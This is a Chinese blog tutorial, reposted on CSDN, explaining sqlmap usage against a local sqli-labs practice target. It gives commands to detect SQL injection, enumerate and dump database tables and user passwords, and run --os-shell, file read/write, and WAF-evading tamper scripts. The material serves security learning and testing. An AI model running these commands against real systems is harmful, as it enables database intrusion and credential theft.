sqlmap使用详解

已于 2022-01-27 16:13:22 修改
阅读量327 收藏
点赞数
文章标签: python 数据库 安全
于 2022-01-27 16:11:23 首次发布
原文链接:https://blog.csdn.net/qq_45676913/article/details/112261376
版权

一、sqlmap基本使用

1、判断是否存在注入

(1) 当检测参数为一个的时候:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1
在这里插入图片描述
(2)当参数大于等于两个时,需要加双引号:python2 sqlmap.py -u "http://localhost/sqli-master/Less-1/?id=1&uid=3"

(3)当测试的位置是cookie或者post传值等位置时,需将获得流量包保存在txt文件中进行测试:python2 sqlmap.py -r 1.txt

2、查询当前用户下的所有数据库

  • 命令:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 --dbs
    在这里插入图片描述

3、获取数据库中的表名

  • 使用-D指定数据库:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 -D security --tables
    在这里插入图片描述

4、获取表中的字段名

  • 使用-D指定数据库,-T指定对应的表:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 -D security -T users --columns
    在这里插入图片描述

5、获取字段内容

  • 使用-D指定数据库,-T指定对应的表,-C指定字段:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 -D security -T users -C id,password,username --dump
    在这里插入图片描述

6、获取数据库所有用户

  • 命令:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 --users
  • 在这里插入图片描述

7、获取数据库用户的密码

  • 命令:python2 sqlmap.py -u “http://localhost/sqli-master/Less-1/?id=1” --passwords
    在这里插入图片描述

8、获取当前网站数据库的名称

  • 命令:python2 sqlmap.py -u “http://localhost/sqli-master/Less-1/?id=1” --current-db
    在这里插入图片描述

9、获取当前网站数据库的用户名称

  • 命令:python2 sqlmap.py -u “http://localhost/sqli-master/Less-1/?id=1” --current-user
    在这里插入图片描述

二、sql高级用法

  • --level 探测等级:level是指探测的等级,随着level的提高,payload会增加、运行时间会增加、同时会自动破解出cookie、XFF头部等注入

  • --risk 风险等级:risk增加后,sql语句不仅会包含select语句,也会包含insert、delete、update等,很可能会对数据库造成严重的破坏,默认为等级1,不建议调高risk等级

  • --is-dba 当前用户是否为管理权限:该命令会查看当前用户是否为忽聚酷管理员权限
    在这里插入图片描述

  • --roles 列出数据库管理员角色

  • referer 检测http Referer头,当referer定义为3或者3以上时,也会尝试对referer注入

  • –sql-shell 运行自定义sql语句(可执行sql语句)

  • --os-cmd --os-shell 运行任意操作系统命令

  • --file-read 从数据库服务器中读取文件

  • --file-write --file-dest 上传文件到服务器中

  • --identify-waf 用于检测是否存在WAF、IDS、IPS

三、sqlmap自带绕过脚本tamper

sqlmap默认情况没有对默认注入的数据进行修改,如果想要绕过WAF等设备,就需要用到绕过脚本tamper对数据进行修改。在tamper脚本中,主要用到正则模块替换共计载荷字符编码的方式绕过WAF检测规则

1、常用tamper脚本

  • 编码绕过
    • apostrophe mask.py 将引号替换成UTF-8,用于过滤单引号
    • base64encode.py 替换为base64编码
    • charencode.py 对给定的payload全部字符使用url编码
    • charunicodeencode.py 字符串unicode编码
    • chardoubleencode.py 对给定的payload全部字符使用双重url编码
  • 双写绕过
    • nonrecursivereplacement 双重查找语句,用双重语句代替预定义的sql关键字
  • 大小写绕过
    • randomcase.py 随机大小写
  • 注释绕过
    • modescurityversioned.py 过滤空格,使用mysql内联注释的方式进行注入
    • modescurityzeroversioned.py 使用mysql内联注释的方式(/!000/)
    • halfversionedmorekeywords.py 当数据库为mysql是绕过防火墙,在每个关键字之前添加mysql版本的注释

2、可参考

转载于:https://blog.csdn.net/qq_45676913/article/details/112261376

zzzxydq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap使用指令详解
06-12
SQLmap是一款网络安全检测工具 支持现在几乎所有的数据库,比国内的任何工具都强。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化...
sqlmap注入详解文档
最新发布
06-30
sqlmap注入详解文档
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9185
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQLSQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap中tamper的用法
路虽远,行将至。事虽难,做必达。
03-09 1万+
sqlmap部分脚本用法说明 1、apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:tamper("1 AND '1'='1") 使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 2、base64encode.py 适用数据库:ALL 作用:替换base64编码 使用脚本前:tamper("1' AND SLEEP(5)#") 使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
sqlmap 使用tamper脚本绕过WAF
xf3401837266的博客
05-22 750
sqlmap 使用tamper脚本绕过WAF
SQLmap教程
Panda_Sanko的博客
03-06 2078
一、Sqlmap直连数据库:-d 服务型数据库(前提知道数据库用户名和密码) : DBMS://USER:PASSWORD@DBMS_ IP:DBMS_ PORT/DATABASE NAME 文件型数据库(前提知道数据库绝对路径): DBMS://DATABASE_ FIL EPATH (SQL ite, Microsoft Access, Firebird, etc. ) 例如: python sqlmap.py -d “myspl://admin: admin@ 192 168 21.17:3306/t
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
测试工具-sqlmap
weixin_42902126的博客
06-27 4273
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
ibatis sqlmap配置详解
01-09
SqlMap的配置是iBatis中应用的核心。这部分任务占据了iBatis开发的...Sql Map配置文件是iBatis配置的核心,从数据库连接到执行SQL使用sqlMap文件都是通过此文件中的配置提供给框架的,它通常命名为sqlMapConfig.xml
Sqlmap用法详解
12-02
非常使用Sqlmap使用方法详细介绍,欢迎大家下载学习
SQLMAP2018版本中文详解
05-13
sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新 sqlmap命令中文详解,2018.5.13更新
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
sqlmap常见参数使用
orTDS_security的博客
07-20 1623
## sqlmap的常见参数使用
渗透工具sqlmap下载安装超详细教程Windows
weixin_56306210的博客
07-20 1万+
渗透工具sqlmap下载安装超详细教程Windows
SQLMAP插件tamper模块介绍
永远是少年
08-25 1535
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper模块介绍。在SQLMAP中,有很多tamper插件,常用的tamper插件及其作用如下所示: **1、apostrophemast.py** 该脚本可以将payload中所有的引号替换成utf-8的格式 **2、base64encode.py** 该脚本可以将payload替换成Base64编码的格式。 **3、multiplespaces.py** 该脚本可以将payload中关
mybatis中大于等于小于等于的写法
我怀念的
11-21 2690
第一种写法(1):原符号 < <= > >= & ’ ” 替换符号 < <= > >= & ' " 例如:sql如下: create_date_time >= #{startTime} and create_date_time <= #{endTime}第二种写法(2):
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1243
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
sqlmap参数大全
卖瓜小农的博客
02-23 8531
sqlmap参数大全 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data “指定参数” 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
sqlmap使用详解:自动化SQL注入工具
"sqlmap用户手册提供了全面的指南,涵盖了如何使用这个强大的SQL注入工具进行安全测试。手册详细解释了sqlmap的功能和操作流程,包括它如何检测和利用不同类型的SQL注入漏洞,以及支持的数据库类型。" sqlmap是一款...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值